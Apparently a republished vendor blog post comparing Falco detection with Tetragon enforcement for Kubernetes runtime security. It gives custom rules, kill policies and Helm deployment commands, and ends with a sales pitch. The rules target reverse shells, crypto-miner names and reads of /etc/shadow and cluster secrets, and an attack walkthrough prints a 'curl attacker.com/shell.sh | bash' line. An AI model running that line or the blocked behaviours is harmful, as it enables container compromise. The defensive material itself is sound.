Originally published on TechSaaS Cloud
Originally published on TechSaaS Cloud
Falco vs Tetragon: Detection vs Enforcement for Container Runtime Security
Here's an uncomfortable truth about container security: most teams deploy Falco, get a firehose of alerts, ignore 90% of them, and call it "runtime security." Meanwhile, the actual attack -- a reverse shell spawned from a compromised Node.js dependency -- fires an alert that sits in a Slack channel for 47 minutes before anyone notices.
Detection without enforcement is just expensive logging.
Cilium Tetragon changes the equation. Instead of alerting you that something bad happened, it kills the process before the bad thing completes. That's a fundamentally different security model, and after deploying both tools across dozens of production clusters, I have strong opinions about when each one belongs in your stack.
How They Actually Work
Both tools use eBPF, but in very different ways.
Falco hooks into system calls via eBPF (or a kernel module on older kernels) and evaluates them against a rules engine. When a rule matches, it generates an alert. The process continues executing. Falco is a detection tool -- it tells you something happened.
Tetragon hooks deeper. It attaches eBPF programs to kernel functions (kprobes, tracepoints, LSM hooks) and can take enforcement actions inline -- before the syscall returns to userspace. It can send SIGKILL to a process, override a syscall return value, or throttle file access. The process doesn't get to finish what it started.
The architectural difference:
Falco: syscall → eBPF probe → userspace engine → alert → (human decides) → response
Tetragon: syscall → eBPF probe → in-kernel policy → SIGKILL (3μs) → alert
That "human decides" gap in the Falco pipeline? That's where breaches happen.
Setting Up Falco for Real Detection
Let's be practical. Here's a Falco deployment that actually catches things, not the default config that alerts on everything:
# falco-custom-rules.yaml
- rule: Reverse Shell Detected
desc: Detect reverse shell connections from containers
condition: >
spawned_process and
container and
((proc.name in (bash, sh, dash, zsh)) and
(fd.type = ipv4 or fd.type = ipv6) and
fd.direction = out)
output: >
Reverse shell detected (container=%container.name
command=%proc.cmdline connection=%fd.name
user=%user.name image=%container.image.repository)
priority: CRITICAL
tags: [network, process, attack]
- rule: Crypto Miner Binary
desc: Known crypto mining process names
condition: >
spawned_process and container and
proc.name in (xmrig, minerd, minergate, cpuminer,
kdevtmpfsi, kinsing)
output: >
Crypto miner detected (container=%container.name
process=%proc.name image=%container.image.repository)
priority: CRITICAL
tags: [process, crypto, attack]
- rule: Sensitive File Read in Container
desc: Reading sensitive files that containers shouldn't touch
condition: >
open_read and container and
(fd.name startswith /etc/shadow or
fd.name startswith /etc/kubernetes/pki or
fd.name startswith /run/secrets/kubernetes.io)
output: >
Sensitive file read (file=%fd.name container=%container.name
command=%proc.cmdline)
priority: WARNING
tags: [filesystem, sensitive]
Deploy with Helm:
helm install falco falcosecurity/falco \
--namespace falco-system --create-namespace \
--set falcosidekick.enabled=true \
--set falcosidekick.config.slack.webhookurl="${SLACK_WEBHOOK}" \
--set falcosidekick.config.alertmanager.hostport="http://alertmanager:9093" \
--set-file falco.rules_file[0]=/path/to/falco-custom-rules.yaml
Setting Up Tetragon for Enforcement
Now the enforcement side. Tetragon uses TracingPolicy custom resources to define what to monitor and how to respond:
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
name: kill-reverse-shells
spec:
kprobes:
- call: "tcp_connect"
syscall: false
args:
- index: 0
type: "sock"
selectors:
- matchBinaries:
- operator: In
values:
- /bin/bash
- /bin/sh
- /bin/dash
- /usr/bin/bash
- /usr/bin/sh
matchActions:
- action: Sigkill
matchNamespaces:
- namespace: Pid
operator: NotIn
values:
- "host_ns"
This policy says: if bash, sh, or dash attempts a TCP connection inside a container (not the host namespace), kill it immediately. No alert delay. No human in the loop. The reverse shell dies before the first byte crosses the wire.
A more nuanced policy for file access:
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
name: protect-sensitive-files
spec:
kprobes:
- call: "security_file_open"
syscall: false
args:
- index: 0
type: "file"
selectors:
- matchArgs:
- index: 0
operator: Prefix
values:
- /etc/shadow
- /etc/kubernetes/pki
matchActions:
- action: Sigkill
matchNamespaces:
- namespace: Pid
operator: NotIn
values:
- "host_ns"
Deploy Tetragon:
helm install tetragon cilium/tetragon \
--namespace kube-system \
--set tetragon.exportFilename=/var/run/cilium/tetragon/tetragon.log \
--set tetragon.enablePolicyFilter=true \
--set tetragon.enableMsgHandlingLatency=true
Real Attack Scenario: The Compromised npm Package
Let's walk through a realistic attack and see how each tool responds.
The attack: A developer installs a compromised npm package that, on import, spawns a child process running curl attacker.com/shell.sh | bash.
Falco response:
- Detects
bashspawned as child ofnode(rule: "Shell Spawned by Non-Shell Program") - Detects outbound network connection from
bash(rule: "Reverse Shell Detected") - Sends alert to Slack + Alertmanager
- Total time from exploit to alert: ~800ms
- Total time from exploit to human response: 3-47 minutes (depending on alerting pipeline and on-call response)
- The shell has been running the entire time
Tetragon response:
-
bashspawned as child ofnode-- logged but allowed (process spawn is legitimate in many apps) -
bashattempts TCP connection -- SIGKILL sent in ~3 microseconds - Process dies. Connection never established.
- Event exported for audit trail
- Total time from exploit to containment: <1ms
The attacker got nothing. Not a single byte of data exfiltrated.
Performance Impact
Security tools that slow your workloads are security tools that get disabled. We measured both on a 50-pod Kubernetes cluster running a mixed workload (API servers, message consumers, batch jobs):
| Metric | No security | Falco | Tetragon | Both |
|---|---|---|---|---|
| CPU overhead (per node) | baseline | +1.8% | +0.9% | +2.5% |
| Memory overhead (per node) | baseline | +180MB | +95MB | +260MB |
| Syscall latency (p99) | baseline | +2.1μs | +0.8μs | +2.7μs |
| Network latency (p99) | baseline | +0.3μs | +0.2μs | +0.4μs |
Tetragon is measurably lighter than Falco. This surprised us initially, but it makes sense: Tetragon does its evaluation in-kernel via eBPF, while Falco copies events to a userspace process for rule evaluation. The kernel/userspace context switch adds overhead.
Both tools are light enough to run simultaneously without meaningful production impact.
When to Use Which (Or Both)
Use Falco when:
- You need comprehensive audit logging (compliance requirements like SOC 2, PCI DSS)
- You want visibility into container behavior before writing enforcement policies
- Your rules need complex logic that eBPF can't express (Falco's rule engine is more flexible)
- You're just starting with runtime security and need to understand your baseline
Use Tetragon when:
- You know what should never happen and want to prevent it, not just detect it
- You need sub-millisecond response to threats
- You're running Cilium for networking (Tetragon integrates natively)
- You want enforcement at the kernel level without a userspace bottleneck
Use both when:
- You want defense in depth: Tetragon blocks known-bad, Falco detects unknown-suspicious
- Compliance requires both prevention and audit trails
- You're running a high-security workload (financial services, healthcare)
Our Recommended Architecture
For most production Kubernetes clusters, we deploy both:
┌─────────────────────────────────────────────┐
│ Kernel Level │
│ Tetragon eBPF → ENFORCE known threats │
│ Falco eBPF → DETECT suspicious activity │
└──────────────┬──────────────┬───────────────┘
│ │
┌──────▼──────┐ ┌────▼──────────┐
│ Tetragon │ │ Falco │
│ Export JSON │ │ Sidekick │
└──────┬──────┘ └────┬──────────┘
│ │
┌──────▼──────────────▼───────────┐
│ Loki / Elasticsearch │
│ (unified security event store) │
└──────────────┬──────────────────┘
│
┌──────────────▼──────────────────┐
│ Grafana Dashboards + Alerts │
└─────────────────────────────────┘
Tetragon handles the "never let this happen" policies (reverse shells, crypto miners, sensitive file access). Falco handles the "this looks weird, investigate" alerts (unusual process trees, unexpected network connections, privilege escalation attempts).
The Migration Path
If you're running Falco today and considering Tetragon:
- Deploy Tetragon in observe-only mode (no
Sigkillactions) alongside Falco - Run for 2 weeks. Compare Tetragon events against Falco alerts. Verify coverage overlap.
- Convert your highest-confidence Falco rules to Tetragon enforcement policies (start with reverse shells and crypto miners -- lowest false-positive risk)
- Gradually move more rules to enforcement as confidence grows
- Keep Falco for detection of novel threats that don't match enforcement patterns
Don't rip out Falco and replace it with Tetragon overnight. The tools are complementary, and the migration needs bake time.
Container runtime security is one of the most impactful and least implemented layers of Kubernetes security. We help teams deploy, tune, and operate runtime security at scale. Get in touch if you want to stop detecting breaches and start preventing them.
Top comments (0)